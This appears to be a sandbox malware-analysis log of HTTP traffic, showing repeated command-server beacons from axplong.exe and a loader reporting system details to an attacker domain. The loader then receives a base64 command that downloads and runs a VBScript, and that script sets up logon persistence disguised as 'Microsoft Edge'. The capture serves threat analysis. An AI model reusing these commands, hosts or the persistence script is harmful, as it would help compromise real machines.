Sep 27, 2024 17:43:01.175760031 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 154
    Cache-Control: no-cache
    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:43:01.408756018 CEST | 196 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:43:01 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.4 | 49858 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:43:01.526613951 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Sep 27, 2024 17:43:02.382951975 CEST | 219 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:43:02 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0
Sep 27, 2024 17:43:02.419157028 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 154
    Cache-Control: no-cache
    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:43:02.679337978 CEST | 196 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:43:02 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.4 | 49860 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:43:02.810136080 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Sep 27, 2024 17:43:03.525504112 CEST | 219 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:43:03 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0
Sep 27, 2024 17:43:03.527072906 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 154
    Cache-Control: no-cache
    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:43:03.779948950 CEST | 196 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:43:03 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.4 | 49863 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:43:03.909044981 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Sep 27, 2024 17:43:04.634247065 CEST | 219 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:43:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 49865 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:43:04.644211054 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 154
    Cache-Control: no-cache
    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:43:05.362236977 CEST | 196 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:43:05 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.4 | 49866 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:43:05.498855114 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Sep 27, 2024 17:43:06.245016098 CEST | 219 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:43:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0
Sep 27, 2024 17:43:06.278886080 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 154
    Cache-Control: no-cache
    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:43:06.515132904 CEST | 196 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:43:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.4 | 49868 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:43:06.659894943 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Sep 27, 2024 17:43:07.374871016 CEST | 219 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:43:07 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 49870 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:43:07.387698889 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 154
    Cache-Control: no-cache
    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:43:08.150934935 CEST | 196 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:43:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.4 | 49871 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:43:08.273228884 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Sep 27, 2024 17:43:08.984005928 CEST | 219 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:43:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.4 | 49873 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:43:08.993453979 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 154
    Cache-Control: no-cache
    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:43:09.713608027 CEST | 196 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:43:09 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
58 | 192.168.2.4 | 49874 | 185.215.113.16 | 80
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:43:09.825216055 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Sep 27, 2024 17:43:10.564949989 CEST | 219 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:43:10 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
59 | 192.168.2.4 | 49875 | 185.215.113.16 | 80
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:43:10.574079037 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 154
    Cache-Control: no-cache
    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:43:11.303515911 CEST | 196 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:43:11 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
60 | 192.168.2.4 | 49876 | 185.215.113.16 | 80
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:43:11.419888973 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Sep 27, 2024 17:43:12.144037008 CEST | 219 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:43:12 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
61 | 192.168.2.4 | 49877 | 185.215.113.16 | 80
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:43:12.155832052 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 154
    Cache-Control: no-cache
    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:43:12.889877081 CEST | 196 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:43:12 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
62 | 192.168.2.4 | 49878 | 185.215.113.16 | 80
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:43:13.014377117 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Sep 27, 2024 17:43:13.723464966 CEST | 219 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:43:13 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49739 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:05 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:05 UTC | 632 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:05 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6fMG%2FDGtxAlx0TaYhQ0e%2F2%2FXDWRwGyTh3fR1G%2F6dUPniigo6bcXQ%2F1wCO%2BC6YQZr0RlyoqEsXL0i474R5FoY0M0yfQdhu%2FZnt4GncfMiicHdzgm%2FOb7qePgtpQgdJurds5q9ClbxQVce"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9a051ed842b8-EWR
2024-09-27 15:42:05 UTC | 176 | IN | Data Raw: 61 61 0d 0a 0a 59 32 51 67 4c 32 51 67 4a 58 52 6c 62 58 41 6c 49 43 59 6d 49 47 52 6c 62 43 42 6a 62 32 35 6d 4c 6e 5a 69 63 79 41 79 50 6d 35 31 62 43 41 6d 4a 69 42 6a 64 58 4a 73 49 43 31 76 49 47 4e 76 62 6d 59 75 64 6d 4a 7a 49 47 68 30 64 48 42 7a 4f 69 38 76 5a 57 6c 71 5a 6e 4a 6f 5a 57 64 79 64 47 4a 79 5a 6d 4e 6b 4c 6d 39 75 62 47 6c 75 5a 53 39 6b 62 33 64 75 62 47 39 68 5a 43 39 6a 62 32 35 6d 4d 53 35 77 61 48 41 67 4a 69 59 67 59 33 4e 6a 63 6d 6c 77 64 43 42 6a 62 32 35 6d 4c 6e 5a 69 63 77 3d 3d 0a 0d 0a
    Data Ascii: aaY2QgL2QgJXRlbXAlICYmIGRlbCBjb25mLnZicyAyPm51bCAmJiBjdXJsIC1vIGNvbmYudmJzIGh0dHBzOi8vZWlqZnJoZWdydGJyZmNkLm9ubGluZS9kb3dubG9hZC9jb25mMS5waHAgJiYgY3NjcmlwdCBjb25mLnZicw==
2024-09-27 15:42:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49743 | 172.67.187.100 | 443 | 7276 | C:\Windows\System32\curl.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:06 UTC | 104 | OUT | GET /download/conf1.php HTTP/1.1
    Host: eijfrhegrtbrfcd.online
    User-Agent: curl/7.83.1
    Accept: */*
2024-09-27 15:42:07 UTC | 667 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:07 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EBsFhwgtmmX0SlCfes1jG2Dc%2FPJDECbfKdmbJx%2FYEwahd2cotWjQWt%2FEUCswDEpM9zoQE4JNq3E2UvrMcK5O4om2kabN8fqSxzE5hxsPFAIPQUSdW1cargIYufHw%2B75e1ZH19PD6pr3X"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Speculation-Rules: "/cdn-cgi/speculation"
    Server: cloudflare
    CF-RAY: 8c9c9a0c29dbc325-EWR
2024-09-27 15:42:07 UTC | 290 | IN | Data Raw: 31 31 62 0d 0a 44 69 6d 20 6f 62 6a 53 68 65 6c 6c 0a 53 65 74 20 6f 62 6a 53 68 65 6c 6c 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 0a 0a 44 69 6d 20 63 6f 6d 6d 61 6e 64 0a 63 6f 6d 6d 61 6e 64 20 3d 20 22 73 63 68 74 61 73 6b 73 20 2f 63 72 65 61 74 65 20 2f 74 6e 20 22 22 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 22 22 20 2f 74 72 20 22 22 22 20 26 20 6f 62 6a 53 68 65 6c 6c 2e 45 78 70 61 6e 64 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 28 22 25 74 65 6d 70 25 22 29 20 26 20 22 5c 4d 69 63 72 6f 73 6f 66 74 2d 45 64 67 65 2e 65 78 65 22 22 20 2f 73 63 20 6f 6e 6c 6f 67 6f 6e 20 2f 72 6c 20 68 69 67 68 65 73 74 20 2f 66 22 0a 0a 6f 62 6a 53 68 65 6c 6c 2e 52 75 6e 20 63 6f 6d 6d 61 6e 64
    Data Ascii: 11bDim objShellSet objShell = CreateObject("WScript.Shell")Dim commandcommand = "schtasks /create /tn ""Microsoft Edge"" /tr """ & objShell.ExpandEnvironmentStrings("%temp%") & "\Microsoft-Edge.exe"" /sc onlogon /rl highest /f"objShell.Run command
2024-09-27 15:42:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 2
Source IP: 192.168.2.4
Source Port: 49745
Destination IP: 172.67.187.100
Destination Port: 443
PID: 1748
Process: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

